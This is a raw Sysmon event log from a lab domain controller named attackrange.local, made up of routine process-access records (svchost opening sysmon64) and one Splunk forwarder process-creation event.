4e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053311Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053310Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053309Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053308Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053307Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053306Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CD0-6151-3000-00000000FD01}19561952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{00000000-0000-0000-0000-000000000000}3348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053305Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.479{5EBD8912-8CD1-6151-3200-00000000FD01}3348C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001053304Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053303Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053302Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053301Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053300Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053299Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053298Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053297Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053296Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053295Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053294Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053293Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053292Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053291Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053290Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053289Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053288Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053287Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053286Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 